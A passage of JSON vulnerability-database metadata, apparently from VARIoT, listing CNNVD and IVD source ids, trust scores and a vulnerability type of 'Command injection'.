"db": "CNNVD",
"id": "CNNVD-201802-814"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Command injection",
"sources": [
{
"db": "IVD",
"id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-814"
}
],
"trust": 0.8
}
}